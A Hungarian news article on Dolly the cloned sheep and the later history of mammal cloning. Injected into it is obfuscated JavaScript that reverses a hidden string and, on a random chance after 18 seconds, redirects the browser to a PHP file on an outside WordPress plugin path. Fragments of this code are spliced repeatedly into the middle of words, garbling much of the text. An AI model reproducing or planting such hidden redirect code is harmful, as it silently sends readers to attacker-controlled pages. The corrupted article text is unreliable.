Kezdőlap Egyéb Tüdőbetegsége miatt kellett elaltatni Dollyt, az első klónozott bárányt

Tüdőbetegsége miatt kellett elaltatni Dollyt, az első klónozott bárányt

Huszonöt éve, 1997. február 22-én jelentették be kutatók a skóciai Edinburgh-ban, hogy sikerült létrehozniuk a világ első, felnőtt egyed sejtjéből klónozott emlősét. A nőstény bárány végül hat és fél évet élt.

A klónozás során a genetikailag azonos, magasabb rendű szervezeteket ivartalan szaporítással, mesterséges módon másolják le. Dollyt úgynevezett sejtmag-átültetéses klónozással hozták létre, ami már egy meglehetősen hosszú múltra visszatekintő eljárás.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top">

Hans Spemann német biológus 1902-ben már egyforma gőtéket hozott létre embriók darabolásával, 1928-ban pedig már végrehajtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta az első sikeres sejtmagátültetést is. Egy 16-sejtes gőteembrió egyik sejtjének sejtmagját helyezte egy sejtmagjától megfosztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, még egysejtes „gőteembrióba”, amely azután normális gőtévé fejlődött. Emlősöket azonban nagyon sokáig nem sikerült klónozni, ezért is volt világhír, amikor bejelentették az első birka klónozását.

Dolly már jóval a bejelentés előtt, 1996. július 5-én megszületett.

Azért vártak a kutatók hónapokat a nyilvánosságra hozatallal, mert le kellett ellenőrizniük a kísérlet közben nyert adatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokat. A skóciai kutatócsoport a klónozni kívánt, finn dorset fajtájú nőstény házi juh emlőmirigyéből kivett sejt magját egy másik nőstény sejtmagjától megfosztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, nem megtermékenyített, de érett petesejtjébe juttatták, miután a két sejt sejtciklusát szinkronizálták. A petesejtet egy skót blackface (fekete pofájú) juhtól vették. A birka Dolly Partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton countryénekes után nevezték el.

A skót kutatók 277 klónt hoztak létre, de csak 29-ből fejlődött ki embrió. Közülük Dolly volt az egyetlen birka, amelyik megszületett.

Az első, felnőtt egyed sejtéből klónozott emlős egész életében a Roslin Intézetben élt Skóciában, hat báránya született. Dollyt végül tüdőproblémák miatt hat és fél éves korában elaltatták. A tudósok a betegség kialakulását nem hozták összefüggésbe a klónozással.

Dolly testét az utókor számára is megőrizték, preparátuma 2003-ban került be az Edinburgh-i Királyi Múzeumba, ahol négy lábán állva, fejét kissé oldalra hajtva fogadja a látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}togatókat. 2005 szeptemberében Budapesten is kiállítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották, a Millenáris parkba költözött Csodák Palotája megnyitójának sztárja volt – írta a mult-kor.hu.

dolly-klon-klonozasAz elsőként klónozott élőlény, Dolly bárány kitömött teste a Csodák Palotájában (Fotó: MTI/Bruzák Noémi)

1997 októberében hozták létre például az első klónozott egeret, ami 2000 májusában pusztult el, 31 hónapos életkora – egér években számolva – 95 évnek felelt meg. Dolly klónozása után még számtalan nagy testű emlőst is klónoztak, többek között disznókat, lovakat és szarvasmarhákat is.

Azonban a klónozás technológiája még közel sem tökéletes, sokszor lépnek fel problémák az eljárás során, igaz ez akkor is, ha mára sokat fejlődött a technológia. Kínai tudósok 2014-ben arról számoltak be, hogy 70–80 százalékos arányban sikeresen klónoztak disznókat. 2016-ban a koreai Sooam Biotech vállalat már napi 500 klónozott embrió előállítására volt képes; 2017-ben pedig kínai kutatók először klónoztak főemlősöket, makákó majmokat.

Sanghaj, 2018. január 25. Csung Csung és Hua Hua, a Kínai Tudományos Akadémia sanghaji idegtudományi intézete által klónozott közönséges makákók (Fotó: MTI/EPA/Kínai Tudományos Akadémia)

Dolly létrehozása tehát sok lehetőséget nyitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott meg. A világ leghíresebb birkája hiába pusztult el 2003-ban, bizonyos formában azért toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovább élt. Később létrehozták Debbie-t, Denise-t, Diannát és Daisyt is, az állatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok Dolly tökéletes klónjai voltak. Ezek az állatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok a közönséges bárányokhoz hasonlóan öregedtek, és kilenc évig éltek.

- Hirdetés -
MEGOSZTÁS
- Hirdetés -